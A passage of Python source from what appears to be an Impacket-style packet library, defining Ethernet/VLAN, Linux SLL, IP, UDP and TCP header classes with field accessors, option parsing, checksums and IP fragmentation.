>> 5\n\n def set_pcp(self, value):\n \"\"\"Sets Priority Code Point\"\"\"\n orig_value = self.get_byte(2)\n self.set_byte(2, (orig_value & 0x1F) | ((value & 0x07) << 5))\n\n def get_dei(self):\n \"\"\"Returns Drop Eligible Indicator\"\"\"\n return (self.get_byte(2) & 0x10) >> 4\n\n def set_dei(self, value):\n \"\"\"Sets Drop Eligible Indicator\"\"\"\n orig_value = self.get_byte(2)\n self.set_byte(2, orig_value | 0x10 if value else orig_value & 0xEF)\n\n def get_vid(self):\n \"\"\"Returns VLAN Identifier\"\"\"\n return self.get_word(2) & 0x0FFF\n\n def set_vid(self, value):\n \"\"\"Sets VLAN Identifier\"\"\"\n orig_value = self.get_word(2)\n self.set_word(2, (orig_value & 0xF000) | (value & 0x0FFF))\n\n def __str__(self):\n priorities = (\n 'Best Effort',\n 'Background',\n 'Excellent Effort',\n 'Critical Applications',\n 'Video, < 100 ms latency and jitter',\n 'Voice, < 10 ms latency and jitter',\n 'Internetwork Control',\n 'Network Control')\n\n pcp = self.get_pcp()\n return '\\n'.join((\n '802.1Q header: 0x{0:08X}'.format(self.get_long(0)),\n 'Priority Code Point: {0} ({1})'.format(pcp, priorities[pcp]),\n 'Drop Eligible Indicator: {0}'.format(self.get_dei()),\n 'VLAN Identifier: {0}'.format(self.get_vid())))\n\n\nclass Ethernet(Header):\n def __init__(self, aBuffer = None):\n Header.__init__(self, 14)\n self.tag_cnt = 0\n if(aBuffer):\n self.load_header(aBuffer)\n\n def set_ether_type(self, aValue):\n \"Set ethernet data type field to 'aValue'\"\n self.set_word(12 + 4*self.tag_cnt, aValue)\n\n def get_ether_type(self):\n \"Return ethernet data type field\"\n return self.get_word(12 + 4*self.tag_cnt)\n\n def get_tag(self, index):\n \"\"\"Returns an EthernetTag initialized from index-th VLAN tag.\n The tags are numbered from 0 to self.tag_cnt-1 as they appear in the frame.\n It is possible to use negative indexes as well.\"\"\"\n index = self.__validate_tag_index(index)\n return EthernetTag(self.get_long(12+4*index))\n\n def set_tag(self, index, tag):\n \"\"\"Sets the index-th VLAN tag to contents of an EthernetTag object.\n The tags are numbered from 0 to self.tag_cnt-1 as they appear in the frame.\n It is possible to use negative indexes as well.\"\"\"\n index = self.__validate_tag_index(index)\n pos = 12 + 4*index\n for i,val in enumerate(tag.get_bytes()):\n self.set_byte(pos+i, val)\n\n def push_tag(self, tag, index=0):\n \"\"\"Inserts contents of an EthernetTag object before the index-th VLAN tag.\n Index defaults to 0 (the top of the stack).\"\"\"\n if index < 0:\n index += self.tag_cnt\n pos = 12 + 4*max(0, min(index, self.tag_cnt))\n data = self.get_bytes()\n data[pos:pos] = tag.get_bytes()\n self.set_bytes(data)\n self.tag_cnt += 1\n\n def pop_tag(self, index=0):\n \"\"\"Removes the index-th VLAN tag and returns it as an EthernetTag object.\n Index defaults to 0 (the top of the stack).\"\"\"\n index = self.__validate_tag_index(index)\n pos = 12 + 4*index\n tag = self.get_long(pos)\n data = self.get_bytes()\n del data[pos:pos+4]\n self.set_bytes(data)\n self.tag_cnt -= 1\n return EthernetTag(tag)\n\n def load_header(self, aBuffer):\n self.tag_cnt = 0\n while aBuffer[12+4*self.tag_cnt:14+4*self.tag_cnt] in (b'\\x81\\x00', b'\\x88\\xa8', b'\\x91\\x00'):\n self.tag_cnt += 1\n\n hdr_len = self.get_header_size()\n diff = hdr_len - len(aBuffer)\n if diff > 0:\n aBuffer += b'\\x00'*diff\n self.set_bytes_from_string(aBuffer[:hdr_len])\n\n def get_header_size(self):\n \"Return size of Ethernet header\"\n return 14 + 4*self.tag_cnt\n\n def get_packet(self):\n\n if self.child():\n try:\n self.set_ether_type(self.child().ethertype)\n except:\n \" an Ethernet packet may have a Data() \"\n pass\n return Header.get_packet(self)\n\n def get_ether_dhost(self):\n \"Return 48 bit destination ethernet address as a 6 byte array\"\n return self.get_bytes()[0:6]\n\n def set_ether_dhost(self, aValue):\n \"Set destination ethernet address from 6 byte array 'aValue'\"\n for i in range(0, 6):\n self.set_byte(i, aValue[i])\n\n def get_ether_shost(self):\n \"Return 48 bit source ethernet address as a 6 byte array\"\n return self.get_bytes()[6:12]\n\n def set_ether_shost(self, aValue):\n \"Set source ethernet address from 6 byte array 'aValue'\"\n for i in range(0, 6):\n self.set_byte(i + 6, aValue[i])\n\n @staticmethod\n def as_eth_addr(anArray):\n tmp_list = [x > 15 and '%x'%x or '0%x'%x for x in anArray]\n return '' + reduce(lambda x, y: x+':'+y, tmp_list)\n\n def __str__(self):\n tmp_str = 'Ether: ' + self.as_eth_addr(self.get_ether_shost()) + ' -> '\n tmp_str += self.as_eth_addr(self.get_ether_dhost())\n if self.child():\n tmp_str += '\\n' + str( self.child())\n return tmp_str\n\n def __validate_tag_index(self, index):\n \"\"\"Adjusts negative indices to their absolute equivalents.\n Raises IndexError when out of range <0, self.tag_cnt-1>.\"\"\"\n if index < 0:\n index += self.tag_cnt\n if index < 0 or index >= self.tag_cnt:\n raise IndexError(\"Tag index out of range\")\n return index\n\n# Linux \"cooked\" capture encapsulation.\n# Used, for instance, for packets returned by the \"any\" interface.\nclass LinuxSLL(Header):\n type_descriptions = [\n \"sent to us by somebody else\",\n \"broadcast by somebody else\",\n \"multicast by somebody else\",\n \"sent to somebody else to somebody else\",\n \"sent by us\",\n ]\n\n def __init__(self, aBuffer = None):\n Header.__init__(self, 16)\n if (aBuffer):\n self.load_header(aBuffer)\n\n def set_type(self, type):\n \"Sets the packet type field to type\"\n self.set_word(0, type)\n\n def get_type(self):\n \"Returns the packet type field\"\n return self.get_word(0)\n\n def set_arphdr(self, value):\n \"Sets the ARPHDR value for the link layer device type\"\n self.set_word(2, value)\n\n def get_arphdr(self):\n \"Returns the ARPHDR value for the link layer device type\"\n return self.get_word(2)\n\n def set_addr_len(self, len):\n \"Sets the length of the sender's address field to len\"\n self.set_word(4, len)\n\n def get_addr_len(self):\n \"Returns the length of the sender's address field\"\n return self.get_word(4)\n\n def set_addr(self, addr):\n \"Sets the sender's address field to addr. Addr must be at most 8-byte long.\"\n addr = array.array('B', addr[:8])\n if len(addr) < 8:\n addr.extend(b'\\0' * (8 - len(addr)))\n self.get_bytes()[6:14] = addr\n\n def get_addr(self):\n \"Returns the sender's address field\"\n return array_tobytes(self.get_bytes()[6:14])\n\n def set_ether_type(self, aValue):\n \"Set ethernet data type field to 'aValue'\"\n self.set_word(14, aValue)\n\n def get_ether_type(self):\n \"Return ethernet data type field\"\n return self.get_word(14)\n\n def get_header_size(self):\n \"Return size of packet header\"\n return 16\n\n def get_packet(self):\n if self.child():\n self.set_ether_type(self.child().ethertype)\n return Header.get_packet(self)\n\n def get_type_desc(self):\n type = self.get_type()\n if type < len(LinuxSLL.type_descriptions):\n return LinuxSLL.type_descriptions[type]\n else:\n return \"Unknown\"\n\n def __str__(self):\n ss = []\n alen = self.get_addr_len()\n addr = hexlify(self.get_addr()[0:alen])\n ss.append(\"Linux SLL: addr=%s type=`%s'\" % (addr, self.get_type_desc()))\n if self.child():\n ss.append(str(self.child()))\n\n return '\\n'.join(ss)\n\n\nclass IP(Header):\n ethertype = 0x800\n def __init__(self, aBuffer = None):\n Header.__init__(self, 20)\n self.set_ip_v(4)\n self.set_ip_hl(5)\n self.set_ip_ttl(255)\n self.__option_list = []\n if(aBuffer):\n # When decoding, checksum shouldn't be modified\n self.auto_checksum = 0\n self.load_header(aBuffer)\n \n if sys.platform.count('bsd'):\n self.is_BSD = True\n else:\n self.is_BSD = False\n\n\n def get_packet(self):\n # set protocol\n if self.get_ip_p() == 0 and self.child():\n self.set_ip_p(self.child().protocol)\n\n # set total length\n if self.get_ip_len() == 0:\n self.set_ip_len(self.get_size())\n\n child_data = self.get_data_as_string()\n\n if self.auto_checksum:\n self.reset_ip_sum()\n\n my_bytes = self.get_bytes()\n\n for op in self.__option_list:\n my_bytes.extend(op.get_bytes())\n\n # Pad to a multiple of 4 bytes\n num_pad = (4 - (len(my_bytes) % 4)) % 4\n if num_pad:\n array_frombytes(my_bytes, b\"\\0\" * num_pad)\n\n # only change ip_hl value if options are present\n if len(self.__option_list):\n self.set_ip_hl(len(my_bytes) // 4)\n\n\n # set the checksum if the user hasn't modified it\n if self.auto_checksum:\n self.set_ip_sum(self.compute_checksum(my_bytes))\n\n if child_data is None:\n return array_tobytes(my_bytes)\n else:\n return array_tobytes(my_bytes) + child_data\n\n\n\n # def calculate_checksum(self, buffer = None):\n # tmp_value = self.get_ip_sum()\n # if self.auto_checksum and (not tmp_value):\n # if buffer:\n # tmp_bytes = buffer\n # else:\n # tmp_bytes = self.bytes[0:self.get_header_size()]\n #\n # self.set_ip_sum(self.compute_checksum(tmp_bytes))\n\n\n def get_pseudo_header(self):\n pseudo_buf = array.array(\"B\")\n pseudo_buf.extend(self.get_bytes()[12:20])\n pseudo_buf.fromlist([0])\n pseudo_buf.extend(self.get_bytes()[9:10])\n tmp_size = self.child().get_size()\n\n size_str = struct.pack(\"!H\", tmp_size)\n\n array_frombytes(pseudo_buf, size_str)\n return pseudo_buf\n\n def add_option(self, option):\n self.__option_list.append(option)\n sum = 0\n for op in self.__option_list:\n sum += op.get_len()\n if sum > 40:\n raise ImpactPacketException(\"Options overflowed in IP packet with length: %d\" % sum)\n\n\n def get_ip_v(self):\n n = self.get_byte(0)\n return (n >> 4)\n\n def set_ip_v(self, value):\n n = self.get_byte(0)\n version = value & 0xF\n n = n & 0xF\n n = n | (version << 4)\n self.set_byte(0, n)\n\n def get_ip_hl(self):\n n = self.get_byte(0)\n return (n & 0xF)\n\n def set_ip_hl(self, value):\n n = self.get_byte(0)\n len = value & 0xF\n n = n & 0xF0\n n = (n | len)\n self.set_byte(0, n)\n\n def get_ip_tos(self):\n return self.get_byte(1)\n\n def set_ip_tos(self,value):\n self.set_byte(1, value)\n\n def get_ip_len(self):\n if self.is_BSD:\n return self.get_word(2, order = '=')\n else:\n return self.get_word(2)\n\n def set_ip_len(self, value):\n if self.is_BSD:\n self.set_word(2, value, order = '=')\n else:\n self.set_word(2, value)\n\n def get_ip_id(self):\n return self.get_word(4)\n def set_ip_id(self, value):\n return self.set_word(4, value)\n\n def get_ip_off(self):\n if self.is_BSD:\n return self.get_word(6, order = '=')\n else:\n return self.get_word(6)\n\n def set_ip_off(self, aValue):\n if self.is_BSD:\n self.set_word(6, aValue, order = '=')\n else:\n self.set_word(6, aValue)\n\n def get_ip_offmask(self):\n return self.get_ip_off() & 0x1FFF\n\n def set_ip_offmask(self, aValue):\n tmp_value = self.get_ip_off() & 0xD000\n tmp_value |= aValue\n self.set_ip_off(tmp_value)\n\n def get_ip_rf(self):\n return self.get_ip_off() & 0x8000\n\n def set_ip_rf(self, aValue):\n tmp_value = self.get_ip_off()\n if aValue:\n tmp_value |= 0x8000\n else:\n my_not = 0xFFFF ^ 0x8000\n tmp_value &= my_not\n self.set_ip_off(tmp_value)\n\n def get_ip_df(self):\n return self.get_ip_off() & 0x4000\n\n def set_ip_df(self, aValue):\n tmp_value = self.get_ip_off()\n if aValue:\n tmp_value |= 0x4000\n else:\n my_not = 0xFFFF ^ 0x4000\n tmp_value &= my_not\n self.set_ip_off(tmp_value)\n\n def get_ip_mf(self):\n return self.get_ip_off() & 0x2000\n\n def set_ip_mf(self, aValue):\n tmp_value = self.get_ip_off()\n if aValue:\n tmp_value |= 0x2000\n else:\n my_not = 0xFFFF ^ 0x2000\n tmp_value &= my_not\n self.set_ip_off(tmp_value)\n\n\n def fragment_by_list(self, aList):\n if self.child() and self.child().protocol is not None:\n proto = self.child().protocol\n else:\n proto = self.get_ip_p()\n\n child_data = self.get_data_as_string()\n if not child_data:\n return [self]\n\n ip_header_bytes = self.get_bytes()\n current_offset = 0\n fragment_list = []\n\n for frag_size in aList:\n ip = IP()\n ip.set_bytes(ip_header_bytes) # copy of original header\n ip.set_ip_p(proto)\n\n\n if frag_size % 8: # round this fragment size up to next multiple of 8\n frag_size += 8 - (frag_size % 8)\n\n\n ip.set_ip_offmask(current_offset // 8)\n current_offset += frag_size\n\n data = Data(child_data[:frag_size])\n child_data = child_data[frag_size:]\n\n ip.set_ip_len(20 + data.get_size())\n ip.contains(data)\n\n\n if child_data:\n\n ip.set_ip_mf(1)\n\n fragment_list.append(ip)\n else: # no more data bytes left to add to fragments\n\n ip.set_ip_mf(0)\n\n fragment_list.append(ip)\n return fragment_list\n\n if child_data: # any remaining data?\n # create a fragment containing all of the remaining child_data\n ip = IP()\n ip.set_bytes(ip_header_bytes)\n ip.set_ip_offmask(current_offset)\n ip.set_ip_len(20 + len(child_data))\n data = Data(child_data)\n ip.contains(data)\n fragment_list.append(ip)\n\n return fragment_list\n\n\n def fragment_by_size(self, aSize):\n data = self.get_data_as_string()\n if not data:\n return [self]\n data_len = len(data)\n num_frags = data_len // aSize\n\n if data_len % aSize:\n num_frags += 1\n\n size_list = []\n for i in range(0, num_frags):\n size_list.append(aSize)\n return self.fragment_by_list(size_list)\n\n\n def get_ip_ttl(self):\n return self.get_byte(8)\n def set_ip_ttl(self, value):\n self.set_byte(8, value)\n\n def get_ip_p(self):\n return self.get_byte(9)\n\n def set_ip_p(self, value):\n self.set_byte(9, value)\n\n def get_ip_sum(self):\n return self.get_word(10)\n def set_ip_sum(self, value):\n self.auto_checksum = 0\n self.set_word(10, value)\n\n def reset_ip_sum(self):\n self.set_ip_sum(0x0000)\n self.auto_checksum = 1\n\n def get_ip_src(self):\n return self.get_ip_address(12)\n def set_ip_src(self, value):\n self.set_ip_address(12, value)\n\n def get_ip_dst(self):\n return self.get_ip_address(16)\n\n def set_ip_dst(self, value):\n self.set_ip_address(16, value)\n\n def get_header_size(self):\n op_len = 0\n for op in self.__option_list:\n op_len += op.get_len()\n\n num_pad = (4 - (op_len % 4)) % 4\n\n return 20 + op_len + num_pad\n\n def load_header(self, aBuffer):\n self.set_bytes_from_string(aBuffer[:20])\n opt_left = (self.get_ip_hl() - 5) * 4\n opt_bytes = array.array('B', aBuffer[20:(20 + opt_left)])\n if len(opt_bytes) != opt_left:\n raise ImpactPacketException(\"Cannot load options from truncated packet\")\n\n\n while opt_left:\n op_type = opt_bytes[0]\n if op_type == IPOption.IPOPT_EOL or op_type == IPOption.IPOPT_NOP:\n new_option = IPOption(op_type)\n op_len = 1\n else:\n op_len = opt_bytes[1]\n if op_len > len(opt_bytes):\n raise ImpactPacketException(\"IP Option length is too high\")\n\n new_option = IPOption(op_type, op_len)\n new_option.set_bytes(opt_bytes[:op_len])\n\n opt_bytes = opt_bytes[op_len:]\n opt_left -= op_len\n self.add_option(new_option)\n if op_type == IPOption.IPOPT_EOL:\n break\n\n\n def __str__(self):\n flags = ' '\n if self.get_ip_df():\n flags += 'DF '\n if self.get_ip_mf():\n flags += 'MF '\n if self.get_ip_rf():\n flags += 'RF '\n tmp_str = 'IP%s%s -> %s ' % (flags, self.get_ip_src(),self.get_ip_dst())\n for op in self.__option_list:\n tmp_str += '\\n' + str(op)\n if self.child():\n tmp_str += '\\n' + str(self.child())\n return tmp_str\n\n\nclass IPOption(PacketBuffer):\n IPOPT_EOL = 0\n IPOPT_NOP = 1\n IPOPT_RR = 7\n IPOPT_TS = 68\n IPOPT_LSRR = 131\n IPOPT_SSRR = 137\n\n def __init__(self, opcode = 0, size = None):\n if size and (size < 3 or size > 40):\n raise ImpactPacketException(\"IP Options must have a size between 3 and 40 bytes\")\n\n if(opcode == IPOption.IPOPT_EOL):\n PacketBuffer.__init__(self, 1)\n self.set_code(IPOption.IPOPT_EOL)\n elif(opcode == IPOption.IPOPT_NOP):\n PacketBuffer.__init__(self, 1)\n self.set_code(IPOption.IPOPT_NOP)\n elif(opcode == IPOption.IPOPT_RR):\n if not size:\n size = 39\n PacketBuffer.__init__(self, size)\n self.set_code(IPOption.IPOPT_RR)\n self.set_len(size)\n self.set_ptr(4)\n\n elif(opcode == IPOption.IPOPT_LSRR):\n if not size:\n size = 39\n PacketBuffer.__init__(self, size)\n self.set_code(IPOption.IPOPT_LSRR)\n self.set_len(size)\n self.set_ptr(4)\n\n elif(opcode == IPOption.IPOPT_SSRR):\n if not size:\n size = 39\n PacketBuffer.__init__(self, size)\n self.set_code(IPOption.IPOPT_SSRR)\n self.set_len(size)\n self.set_ptr(4)\n\n elif(opcode == IPOption.IPOPT_TS):\n if not size:\n size = 40\n PacketBuffer.__init__(self, size)\n self.set_code(IPOption.IPOPT_TS)\n self.set_len(size)\n self.set_ptr(5)\n self.set_flags(0)\n else:\n if not size:\n raise ImpactPacketException(\"Size required for this type\")\n PacketBuffer.__init__(self,size)\n self.set_code(opcode)\n self.set_len(size)\n\n\n def append_ip(self, ip):\n op = self.get_code()\n if not (op == IPOption.IPOPT_RR or op == IPOption.IPOPT_LSRR or op == IPOption.IPOPT_SSRR or op == IPOption.IPOPT_TS):\n raise ImpactPacketException(\"append_ip() not support for option type %d\" % self.opt_type)\n\n p = self.get_ptr()\n if not p:\n raise ImpactPacketException(\"append_ip() failed, option ptr uninitialized\")\n\n if (p + 4) > self.get_len():\n raise ImpactPacketException(\"append_ip() would overflow option\")\n\n self.set_ip_address(p - 1, ip)\n p += 4\n self.set_ptr(p)\n\n\n def set_code(self, value):\n self.set_byte(0, value)\n\n def get_code(self):\n return self.get_byte(0)\n\n\n def set_flags(self, flags):\n if not (self.get_code() == IPOption.IPOPT_TS):\n raise ImpactPacketException(\"Operation only supported on Timestamp option\")\n self.set_byte(3, flags)\n\n def get_flags(self, flags):\n if not (self.get_code() == IPOption.IPOPT_TS):\n raise ImpactPacketException(\"Operation only supported on Timestamp option\")\n return self.get_byte(3)\n\n\n def set_len(self, len):\n self.set_byte(1, len)\n\n\n def set_ptr(self, ptr):\n self.set_byte(2, ptr)\n\n def get_ptr(self):\n return self.get_byte(2)\n\n def get_len(self):\n return len(self.get_bytes())\n\n\n def __str__(self):\n map = {IPOption.IPOPT_EOL : \"End of List \",\n IPOption.IPOPT_NOP : \"No Operation \",\n IPOption.IPOPT_RR : \"Record Route \",\n IPOption.IPOPT_TS : \"Timestamp \",\n IPOption.IPOPT_LSRR : \"Loose Source Route \",\n IPOption.IPOPT_SSRR : \"Strict Source Route \"}\n\n tmp_str = \"\\tIP Option: \"\n op = self.get_code()\n if op in map:\n tmp_str += map[op]\n else:\n tmp_str += \"Code: %d \" % op\n\n if op == IPOption.IPOPT_RR or op == IPOption.IPOPT_LSRR or op ==IPOption.IPOPT_SSRR:\n tmp_str += self.print_addresses()\n\n\n return tmp_str\n\n\n def print_addresses(self):\n p = 3\n tmp_str = \"[\"\n if self.get_len() >= 7: # at least one complete IP address\n while 1:\n if p + 1 == self.get_ptr():\n tmp_str += \"#\"\n tmp_str += self.get_ip_address(p)\n p += 4\n if p >= self.get_len():\n break\n else:\n tmp_str += \", \"\n tmp_str += \"] \"\n if self.get_ptr() % 4: # ptr field should be a multiple of 4\n tmp_str += \"nonsense ptr field: %d \" % self.get_ptr()\n return tmp_str\n\n\nclass UDP(Header):\n protocol = 17\n def __init__(self, aBuffer = None):\n Header.__init__(self, 8)\n if(aBuffer):\n self.load_header(aBuffer)\n\n def get_uh_sport(self):\n return self.get_word(0)\n def set_uh_sport(self, value):\n self.set_word(0, value)\n\n def get_uh_dport(self):\n return self.get_word(2)\n def set_uh_dport(self, value):\n self.set_word(2, value)\n\n def get_uh_ulen(self):\n return self.get_word(4)\n\n def set_uh_ulen(self, value):\n self.set_word(4, value)\n\n def get_uh_sum(self):\n return self.get_word(6)\n\n def set_uh_sum(self, value):\n self.set_word(6, value)\n self.auto_checksum = 0\n\n def calculate_checksum(self):\n if self.auto_checksum and (not self.get_uh_sum()):\n # if there isn't a parent to grab a pseudo-header from we'll assume the user knows what they're doing\n # and won't meddle with the checksum or throw an exception\n if not self.parent():\n return\n\n buffer = self.parent().get_pseudo_header()\n\n buffer += self.get_bytes()\n data = self.get_data_as_string()\n if(data):\n array_frombytes(buffer, data)\n self.set_uh_sum(self.compute_checksum(buffer))\n\n def get_header_size(self):\n return 8\n\n def __str__(self):\n tmp_str = 'UDP %d -> %d' % (self.get_uh_sport(), self.get_uh_dport())\n if self.child():\n tmp_str += '\\n' + str(self.child())\n return tmp_str\n\n def get_packet(self):\n # set total length\n if(self.get_uh_ulen() == 0):\n self.set_uh_ulen(self.get_size())\n return Header.get_packet(self)\n\nclass TCP(Header):\n protocol = 6\n TCP_FLAGS_MASK = 0x00FF # lowest 16 bits are the flags\n def __init__(self, aBuffer = None):\n Header.__init__(self, 20)\n self.set_th_off(5)\n self.__option_list = []\n if aBuffer:\n self.load_header(aBuffer)\n\n def add_option(self, option):\n self.__option_list.append(option)\n\n sum = 0\n for op in self.__option_list:\n sum += op.get_size()\n\n if sum > 40:\n raise ImpactPacketException(\"Cannot add TCP option, would overflow option space\")\n\n def get_options(self):\n return self.__option_list\n\n def swapSourceAndDestination(self):\n oldSource = self.get_th_sport()\n self.set_th_sport(self.get_th_dport())\n self.set_th_dport(oldSource)\n\n #\n # Header field accessors\n #\n\n def set_th_sport(self, aValue):\n self.set_word(0, aValue)\n\n def get_th_sport(self):\n return self.get_word(0)\n\n def get_th_dport(self):\n return self.get_word(2)\n\n def set_th_dport(self, aValue):\n self.set_word(2, aValue)\n\n def get_th_seq(self):\n return self.get_long(4)\n\n def set_th_seq(self, aValue):\n self.set_long(4, aValue)\n\n def get_th_ack(self):\n return self.get_long(8)\n\n def set_th_ack(self, aValue):\n self.set_long(8, aValue)\n\n def get_th_flags(self):\n return self.get_word(12) & self.TCP_FLAGS_MASK\n \n def set_th_flags(self, aValue):\n masked = self.get_word(12) & (~self.TCP_FLAGS_MASK)\n nb = masked | (aValue & self.TCP_FLAGS_MASK)\n return self.set_word(12, nb, \">\")\n \n def get_th_win(self):\n return self.get_word(14)\n\n def set_th_win(self, aValue):\n self.set_word(14, aValue)\n\n def set_th_sum(self, aValue):\n self.set_word(16, aValue)\n self.auto_checksum = 0\n\n def get_th_sum(self):\n return self.get_word(16)\n\n def get_th_urp(self):\n return self.get_word(18)\n\n def set_th_urp(self, aValue):\n return self.set_word(18, aValue)\n\n # Flag accessors\n\n def get_th_reserved(self):\n tmp_value = self.get_byte(12) & 0x0f\n return tmp_value\n\n\n def get_th_off(self):\n tmp_value = self.get_byte(12) >> 4\n return tmp_value\n\n def set_th_off(self, aValue):\n mask = 0xF0\n masked = self.get_byte(12) & (~mask)\n nb = masked | ( (aValue << 4) & mask)\n return self.set_byte(12, nb)\n\n def get_CWR(self):\n return self.get_flag(128)\n def set_CWR(self):\n return self.set_flags(128)\n def reset_CWR(self):\n return self.reset_flags(128)\n\n def get_ECE(self):\n return self.get_flag(64)\n def set_ECE(self):\n return self.set_flags(64)\n def reset_ECE(self):\n return self.reset_flags(64)\n\n def get_URG(self):\n return self.get_flag(32)\n def set_URG(self):\n return self.set_flags(32)\n def reset_URG(self):\n return self.reset_flags(32)\n\n def get_ACK(self):\n return self.get_flag(16)\n def set_ACK(self):\n return self.set_flags(16)\n def reset_ACK(self):\n return self.reset_flags(16)\n\n def get_PSH(self):\n return self.get_flag(8)\n def set_PSH(self):\n return self.set_flags(8)\n def reset_PSH(self):\n return self.reset_flags(8)\n\n def get_RST(self):\n return self.get_flag(4)\n def set_RST(self):\n return self.set_flags(4)\n def reset_RST(self):\n return self.reset_flags(4)\n\n def get_SYN(self):\n return self.get_flag(2)\n def set_SYN(self):\n return self.set_flags(2)\n def reset_SYN(self):\n return self.reset_flags(2)\n\n def get_FIN(self):\n return self.get_flag(1)\n def set_FIN(self):\n return self.set_flags(1)\n def reset_FIN(self):\n return self.reset_flags(1)\n\n # Overridden Methods\n\n def get_header_size(self):\n return 20 + len(self.get_padded_options())\n\n def calculate_checksum(self):\n if not self.auto_checksum or not self.parent():\n return\n\n self.set_th_sum(0)\n buffer = self.parent().get_pseudo_header()\n buffer += self.get_bytes()\n buffer += self.get_padded_options()\n\n data = self.get_data_as_string()\n if(data):\n array_frombytes(buffer, data)\n\n res = self.compute_checksum(buffer)\n\n self.set_th_sum(self.compute_checksum(buffer))\n\n def get_packet(self):\n \"Returns entire packet including child data as a string. This is the function used to extract the final packet\"\n\n # only change th_off value if options are present\n if len(self.__option_list):\n self.set_th_off(self.get_header_size() // 4)\n\n self.calculate_checksum()\n\n bytes = self.get_bytes() + self.get_padded_options()\n data = self.get_data_as_string()\n\n if data:\n return array_tobytes(bytes) + data\n else:\n return array_tobytes(bytes)\n\n def load_header(self, aBuffer):\n self.set_bytes_from_string(aBuffer[:20])\n opt_left = (self.get_th_off() - 5) * 4\n opt_bytes = array.array('B', aBuffer[20:(20 + opt_left)])\n if len(opt_bytes) != opt_left:\n raise ImpactPacketException(\"Cannot load options from truncated packet\")\n\n while opt_left:\n op_kind = opt_bytes[0]\n if op_kind == TCPOption.TCPOPT_EOL or op_kind == TCPOption.TCPOPT_NOP:\n new_option = TCPOption(op_kind)\n op_len = 1\n else:\n op_len = opt_bytes[1]\n if op_len > len(opt_bytes):\n raise ImpactPacketException(\"TCP Option length is too high\")\n if op_len < 2:\n raise ImpactPacketException(\"TCP Option length is too low\")\n\n new_option = TCPOption(op_kind)\n new_option.set_bytes(opt_bytes[:op_len])\n\n opt_bytes = opt_bytes[op_len:]\n opt_left -= op_len\n self.add_option(new_option)\n if op_kind == TCPOption.TCPOPT_EOL:\n break\n\n #\n # Private\n #\n\n def get_flag(self, bit):\n if self.get_th_flags() & bit:\n return 1\n else:\n return 0\n\n def reset_flags(self, aValue):\n tmp_value = self.get_th_flags() & (~aValue)\n return self.set_th_flags(tmp_value)\n\n def set_flags(self, aValue):\n tmp_value = self.get_th_flags() | aValue\n return self.set_th_flags(tmp_value)\n\n def get_padded_options(self):\n \"Return an array containing all options padded to a 4 byte boundary\"\n op_buf = array.array('B')\n for op in self.__option_list:\n op_buf += op.get_bytes()\n num_pad = (4 - (len(op_buf) % 4)) % 4\n if num_pad:\n array_frombytes(op_buf, b\"\\0\" * num_pad)\n return op_buf\n\n def __str__(self):\n tmp_str = 'TCP '\n if self.get_ECE():\n tmp_str += 'ece '\n if self.get_CWR():\n tmp_str += 'cwr '\n if self.get_ACK():\n tmp_str += 'ack '\n if self.get_FIN():\n tmp_str += 'fin '\n if self.get_PSH():\n tmp_str += 'push '\n if self.get_RST():\n tmp_str += 'rst '\n if self.get_SYN():\n tmp_str += 'syn '\n if self.get_URG():\n tmp_str += 'urg '\n tmp_str += '%d -> %d' % (self.get_th_sport(), self.get_th_dport())\n for op in self.__option_list:\n tmp_str += '\\n' + str(op)\n\n if self.child():\n tmp_str += '\\n' + str(self.child())\n return tmp_str\n\n\nclass TCPOption(PacketBuffer):\n TCPOPT_EOL = 0\n TCPOPT_NOP = 1\n TCPOPT_MAXSEG = 2\n TCPOPT_WINDOW = 3\n TCPOPT_SACK_PERMITTED = 4\n TCPOPT_SACK = 5\n TCPOPT_TIMESTAMP = 8\n TCPOPT_SIGNATURE = 19\n\n\n def __init__(self, kind, data = None):\n\n if kind == TCPOption.TCPOPT_EOL:\n PacketBuffer.__init__(self, 1)\n self.set_kind(TCPOption.TCPOPT_EOL)\n elif kind == TCPOption.TCPOPT_NOP:\n PacketBuffer.__init__(self, 1)\n self.set_kind(TCPOption.TCPOPT_NOP)\n elif kind == TCPOption.TCPOPT_MAXSEG:\n PacketBuffer.__init__(self, 4)\n self.set_kind(TCPOption.TCPOPT_MAXSEG)\n self.set_len(4)\n if data:\n self.set_mss(data)\n else:\n self.set_mss(512)\n elif kind == TCPOption.TCPOPT_WINDOW:\n PacketBuffer.__init__(self, 3)\n self.set_kind(TCPOption.TCPOPT_WINDOW)\n self.set_len(3)\n if data:\n self.set_shift_cnt(data)\n else:\n self.set_shift_cnt(0)\n elif kind == TCPOption.TCPOPT_TIMESTAMP:\n PacketBuffer.__init__(self, 10)\n self.set_kind(TCPOption.TCPOPT_TIMESTAMP)\n self.set_len(10)\n if data:\n self.set_ts(data)\n else:\n self.set_ts(0)\n elif kind == TCPOption.TCPOPT_SACK_PERMITTED:\n PacketBuffer.__init__(self, 2)\n self.set_kind(TCPOption.TCPOPT_SACK_PERMITTED)\n self.set_len(2) \n\n elif kind == TCPOption.TCPOPT_SACK:\n PacketBuffer.__init__(self, 2)\n self.set_kind(TCPOption.TCPOPT_SACK)\n\n def set_left_edge(self, aValue):\n self.set_long (2, aValue)\n\n def set_right_edge(self, aValue):\n self.set_long (6, aValue)\n\n def set_kind(self, kind):\n self.set_byte(0, kind)\n\n\n def get_kind(self):\n return self.get_byte(0)\n\n\n def set_len(self, len):\n if self.get_size() < 2:\n raise ImpactPacketException(\"Cannot set length field on an option having a size smaller than 2 bytes\")\n self.set_byte(1, len)\n\n def get_len(self):\n if self.get_size() < 2:\n raise ImpactPacketException(\"Cannot retrieve length field from an option having a size smaller than 2 bytes\")\n return self.get_byte(1)\n\n def get_size(self):\n return len(self.get_bytes())\n\n\n def set_mss(self, len):\n if self.get_kind() != TCPOption.TCPOPT_MAXSEG:\n raise ImpactPacketException(\"Can only set MSS on TCPOPT_MAXSEG option\")\n self.set_word(2, len)\n\n def get_mss(self):\n if self.get_kind() != TCPOption.TCPOPT_MAXSEG:\n raise ImpactPacketException(\"Can only retrieve MSS from TCPOPT_MAXSEG option\")\n return self.get_word(2)\n\n def set_shift_cnt(self, cnt):\n if self.get_kind() != TCPOption.TCPOPT_WINDOW:\n raise ImpactPacketException(\"Can only set Shift Count on TCPOPT_WINDOW option\")\n self.set_byte(2, cnt)\n\n def get_shift_cnt(self):\n if self.get_kind() != TCPOption.TCPOPT_WINDOW:\n raise ImpactPacketException(\"Can only retrieve Shift Count from TCPOPT_WINDOW option\")\n return self.get_byte(2)\n\n def get_ts(self):\n if self.get_kind() != TCPOption.TCPOPT_TIMESTAMP:\n raise ImpactPacketException(\"Can only 